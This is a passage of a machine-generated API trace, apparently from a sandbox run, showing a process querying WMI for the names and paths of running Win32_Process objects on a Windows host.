out: pVal=0x19f1b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3768\"", varVal2=0x0), pType=0x19f234*=8, plFlavor=0x19f230*=64) returned 0x0 [0264.710] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3768\"") returned 0x5e [0264.710] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3768\"") returned 0x5e [0264.711] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1dc | out: ppv=0x19f1dc*=0x601a94) returned 0x0 [0264.711] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1d4 | out: pAptType=0x19f1d4*=1) returned 0x0 [0264.711] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x0) returned 0x80004002 [0264.711] IUnknown:Release (This=0x601a94) returned 0x1 [0264.711] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eb48 | out: ppv=0x19eb48*=0x54ba388) returned 0x0 [0264.712] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba388, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ed60 | out: ppvObject=0x19ed60*=0x0) returned 0x80004002 [0264.712] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba388, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed74 | out: ppvObject=0x19ed74*=0x5514818) returned 0x0 [0264.712] WbemDefPath:IUnknown:Release (This=0x54ba388) returned 0x0 [0264.712] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514818, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e994 | out: ppvObject=0x19e994*=0x5514818) returned 0x0 [0264.712] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514818, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e950 | out: ppvObject=0x19e950*=0x0) returned 0x80004002 [0264.712] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514818, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e544 | out: ppvObject=0x19e544*=0x0) returned 0x80004002 [0264.712] WbemDefPath:IUnknown:AddRef (This=0x5514818) returned 0x3 [0264.712] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514818, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2ac | out: ppvObject=0x19e2ac*=0x0) returned 0x80004002 [0264.712] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514818, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e25c | out: ppvObject=0x19e25c*=0x0) returned 0x80004002 [0264.712] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514818, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e268 | out: ppvObject=0x19e268*=0x551de08) returned 0x0 [0264.712] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x551de08, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e270 | out: pCid=0x19e270*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0264.712] WbemDefPath:IUnknown:Release (This=0x551de08) returned 0x3 [0264.712] CoGetContextToken (in: pToken=0x19e2c8 | out: pToken=0x19e2c8) returned 0x0 [0264.712] CoGetContextToken (in: pToken=0x19e6d0 | out: pToken=0x19e6d0) returned 0x0 [0264.712] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514818, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e760 | out: ppvObject=0x19e760*=0x0) returned 0x80004002 [0264.712] WbemDefPath:IUnknown:Release (This=0x5514818) returned 0x2 [0264.712] WbemDefPath:IUnknown:Release (This=0x5514818) returned 0x1 [0264.713] CoGetContextToken (in: pToken=0x19f058 | out: pToken=0x19f058) returned 0x0 [0264.713] CoGetContextToken (in: pToken=0x19efb8 | out: pToken=0x19efb8) returned 0x0 [0264.713] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514818, riid=0x19f088*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f084 | out: ppvObject=0x19f084*=0x5514818) returned 0x0 [0264.713] WbemDefPath:IUnknown:AddRef (This=0x5514818) returned 0x3 [0264.713] WbemDefPath:IUnknown:Release (This=0x5514818) returned 0x2 [0264.713] WbemDefPath:IWbemPath:SetText (This=0x5514818, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3768\"") returned 0x0 [0264.713] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f208 | out: puCount=0x19f208*=0x2) returned 0x0 [0264.713] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0x0, pszText=0x0 | out: puBuffLength=0x19f204*=0xf, pszText=0x0) returned 0x0 [0264.713] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f204*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0264.713] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1d4 | out: puCount=0x19f1d4*=0x2) returned 0x0 [0264.713] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0x0, pszText=0x0 | out: puBuffLength=0x19f1d0*=0xf, pszText=0x0) returned 0x0 [0264.713] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0264.713] IWbemClassObject:Get (in: This=0x5518aa0, wszName="Name", lFlags=0, pVal=0x19f1d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23d11f4*=0, plFlavor=0x23d11f8*=0 | out: pVal=0x19f1d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="white_effort_certain.exe", varVal2=0x0), pType=0x23d11f4*=8, plFlavor=0x23d11f8*=0) returned 0x0 [0264.713] SysStringByteLen (bstr="white_effort_certain.exe") returned 0x30 [0264.713] SysStringByteLen (bstr="white_effort_certain.exe") returned 0x30 [0264.713] IWbemClassObject:Get (in: This=0x5518aa0, wszName="Name", lFlags=0, pVal=0x19f1d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23d11f4*=8, plFlavor=0x23d11f8*=0 | out: pVal=0x19f1d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="white_effort_certain.exe", varVal2=0x0), pType=0x23d11f4*=8, plFlavor=0x23d11f8*=0) returned 0x0 [0264.713] SysStringByteLen (bstr="white_effort_certain.exe") returned 0x30 [0264.713] SysStringByteLen (bstr="white_effort_certain.exe") returned 0x30 [0264.714] CoTaskMemAlloc (cb=0x4) returned 0x54ba388 [0264.714] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba388, puReturned=0x23c1fd0 | out: apObjects=0x54ba388*=0x5518c38, puReturned=0x23c1fd0*=0x1) returned 0x0 [0264.874] IUnknown:QueryInterface (in: This=0x5518c38, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e840 | out: ppvObject=0x19e840*=0x5518c38) returned 0x0 [0264.874] IUnknown:QueryInterface (in: This=0x5518c38, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e7fc | out: ppvObject=0x19e7fc*=0x0) returned 0x80004002 [0264.875] IUnknown:QueryInterface (in: This=0x5518c38, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e61c | out: ppvObject=0x19e61c*=0x0) returned 0x80004002 [0264.875] IUnknown:QueryInterface (in: This=0x5518c38, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e3f4 | out: ppvObject=0x19e3f4*=0x0) returned 0x80004002 [0264.875] IUnknown:AddRef (This=0x5518c38) returned 0x3 [0264.875] IUnknown:QueryInterface (in: This=0x5518c38, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e15c | out: ppvObject=0x19e15c*=0x0) returned 0x80004002 [0264.875] IUnknown:QueryInterface (in: This=0x5518c38, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e10c | out: ppvObject=0x19e10c*=0x0) returned 0x80004002 [0264.875] IUnknown:QueryInterface (in: This=0x5518c38, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e118 | out: ppvObject=0x19e118*=0x5518c3c) returned 0x0 [0264.875] IMarshal:GetUnmarshalClass (in: This=0x5518c3c, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e120 | out: pCid=0x19e120*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0264.875] IUnknown:Release (This=0x5518c3c) returned 0x3 [0264.875] CoGetContextToken (in: pToken=0x19e178 | out: pToken=0x19e178) returned 0x0 [0264.875] CoGetContextToken (in: pToken=0x19e580 | out: pToken=0x19e580) returned 0x0 [0264.875] IUnknown:QueryInterface (in: This=0x5518c38, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e610 | out: ppvObject=0x19e610*=0x0) returned 0x80004002 [0264.876] IUnknown:Release (This=0x5518c38) returned 0x2 [0264.876] CoGetContextToken (in: pToken=0x19eb50 | out: pToken=0x19eb50) returned 0x0 [0264.876] CoGetContextToken (in: pToken=0x19eab0 | out: pToken=0x19eab0) returned 0x0 [0264.876] IUnknown:QueryInterface (in: This=0x5518c38, riid=0x19eb80*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19eb7c | out: ppvObject=0x19eb7c*=0x5518c38) returned 0x0 [0264.876] IUnknown:AddRef (This=0x5518c38) returned 0x4 [0264.876] IUnknown:Release (This=0x5518c38) returned 0x3 [0264.876] IUnknown:Release (This=0x5518c38) returned 0x2 [0264.876] CoTaskMemFree (pv=0x54ba388) [0264.876] CoGetContextToken (in: pToken=0x19eeb8 | out: pToken=0x19eeb8) returned 0x0 [0264.876] IUnknown:AddRef (This=0x5518c38) returned 0x3 [0264.876] IWbemClassObject:Get (in: This=0x5518c38, wszName="__GENUS", lFlags=0, pVal=0x19f1cc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f24c*=0, plFlavor=0x19f248*=0 | out: pVal=0x19f1cc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f24c*=3, plFlavor=0x19f248*=64) returned 0x0 [0264.876] IWbemClassObject:Get (in: This=0x5518c38, wszName="__PATH", lFlags=0, pVal=0x19f1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f234*=0, plFlavor=0x19f230*=0 | out: pVal=0x19f1b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"1060\"", varVal2=0x0), pType=0x19f234*=8, plFlavor=0x19f230*=64) returned 0x0 [0264.876] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"1060\"") returned 0x5e [0264.876] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"1060\"") returned 0x5e [0264.876] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1dc | out: ppv=0x19f1dc*=0x601a94) returned 0x0 [0264.876] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1d4 | out: pAptType=0x19f1d4*=1) returned 0x0 [0264.877] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x0) returned 0x80004002 [0264.877] IUnknown:Release (This=0x601a94) returned 0x1 [0264.877] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eb48 | out: ppv=0x19eb48*=0x54ba388) returned 0x0 [0264.878] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba388, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ed60 | out: ppvObject=0x19ed60*=0x0) returned 0x80004002 [0264.878] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba388, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed74 | out: ppvObject=0x19ed74*=0x5514ab8) returned 0x0 [0264.878] WbemDefPath:IUnknown:Release (This=0x54ba388) returned 0x0 [0264.878] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514ab8, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e994 | out: ppvObject=0x19e994*=0x5514ab8) returned 0x0 [0264.878] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514ab8, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e950 | out: ppvObject=0x19e950*=0x0) returned 0x80004002 [0264.878] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514ab8, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e544 | out: ppvObject=0x19e544*=0x0) returned 0x80004002 [0264.878] WbemDefPath:IUnknown:AddRef (This=0x5514ab8) returned 0x3 [0264.878] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514ab8, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2ac | out: ppvObject=0x19e2ac*=0x0) returned 0x80004002 [0264.878] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514ab8, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e25c | out: ppvObject=0x19e25c*=0x0) returned 0x80004002 [0264.878] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514ab8, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e268 | out: ppvObject=0x19e268*=0x551df58) returned 0x0 [0264.878] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x551df58, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e270 | out: pCid=0x19e270*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0264.878] WbemDefPath:IUnknown:Release (This=0x551df58) returned 0x3 [0264.878] CoGetContextToken (in: pToken=0x19e2c8 | out: pToken=0x19e2c8) returned 0x0 [0264.879] CoGetContextToken (in: pToken=0x19e6d0 | out: pToken=0x19e6d0) returned 0x0 [0264.879] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514ab8, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e760 | out: ppvObject=0x19e760*=0x0) returned 0x80004002 [0264.879] WbemDefPath:IUnknown:Release (This=0x5514ab8) returned 0x2 [0264.879] WbemDefPath:IUnknown:Release (This=0x5514ab8) returned 0x1 [0264.879] CoGetContextToken (in: pToken=0x19f058 | out: pToken=0x19f058) returned 0x0 [0264.879] CoGetContextToken (in: pToken=0x19efb8 | out: pToken=0x19efb8) returned 0x0 [0264.879] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514ab8, riid=0x19f088*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f084 | out: ppvObject=0x19f084*=0x5514ab8) returned 0x0 [0264.879] WbemDefPath:IUnknown:AddRef (This=0x5514ab8) returned 0x3 [0264.879] WbemDefPath:IUnknown:Release (This=0x5514ab8) returned 0x2 [0264.880] WbemDefPath:IWbemPath:SetText (This=0x5514ab8, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"1060\"") returned 0x0 [0264.880] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f208 | out: puCount=0x19f208*=0x2) returned 0x0 [0264.880] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0x0, pszText=0x0 | out: puBuffLength=0x19f204*=0xf, pszText=0x0) returned 0x0 [0264.880] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f204*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0264.880] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1d4 | out: puCount=0x19f1d4*=0x2) returned 0x0 [0264.880] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0x0, pszText=0x0 | out: puBuffLength=0x19f1d0*=0xf, pszText=0x0) returned 0x0 [0264.880] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0264.880] IWbemClassObject:Get (in: This=0x5518c38, wszName="Name", lFlags=0, pVal=0x19f1d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23d1ab8*=0, plFlavor=0x23d1abc*=0 | out: pVal=0x19f1d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="test_two.exe", varVal2=0x0), pType=0x23d1ab8*=8, plFlavor=0x23d1abc*=0) returned 0x0 [0264.881] SysStringByteLen (bstr="test_two.exe") returned 0x18 [0264.881] SysStringByteLen (bstr="test_two.exe") returned 0x18 [0264.881] IWbemClassObject:Get (in: This=0x5518c38, wszName="Name", lFlags=0, pVal=0x19f1d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23d1ab8*=8, plFlavor=0x23d1abc*=0 | out: pVal=0x19f1d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="test_two.exe", varVal2=0x0), pType=0x23d1ab8*=8, plFlavor=0x23d1abc*=0) returned 0x0 [0264.881] SysStringByteLen (bstr="test_two.exe") returned 0x18 [0264.881] SysStringByteLen (bstr="test_two.exe") returned 0x18 [0264.882] CoTaskMemAlloc (cb=0x4) returned 0x54ba2c8 [0264.882] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba2c8, puReturned=0x23c1fd0 | out: apObjects=0x54ba2c8*=0x5520260, puReturned=0x23c1fd0*=0x1) returned 0x0 [0264.884] IUnknown:QueryInterface (in: This=0x5520260, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e840 | out: ppvObject=0x19e840*=0x5520260) returned 0x0 [0264.884] IUnknown:QueryInterface (in: This=0x5520260, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e7fc | out: ppvObject=0x19e7fc*=0x0) returned 0x80004002 [0264.884] IUnknown:QueryInterface (in: This=0x5520260, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e61c | out: ppvObject=0x19e61c*=0x0) returned 0x80004002 [0264.884] IUnknown:QueryInterface (in: This=0x5520260, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e3f4 | out: ppvObject=0x19e3f4*=0x0) returned 0x80004002 [0264.884] IUnknown:AddRef (This=0x5520260) returned 0x3 [0264.884] IUnknown:QueryInterface (in: This=0x5520260, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e15c | out: ppvObject=0x19e15c*=0x0) returned 0x80004002 [0264.884] IUnknown:QueryInterface (in: This=0x5520260, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e10c | out: ppvObject=0x19e10c*=0x0) returned 0x80004002 [0264.885] IUnknown:QueryInterface (in: This=0x5520260, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e118 | out: ppvObject=0x19e118*=0x5520264) returned 0x0 [0264.885] IMarshal:GetUnmarshalClass (in: This=0x5520264, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, 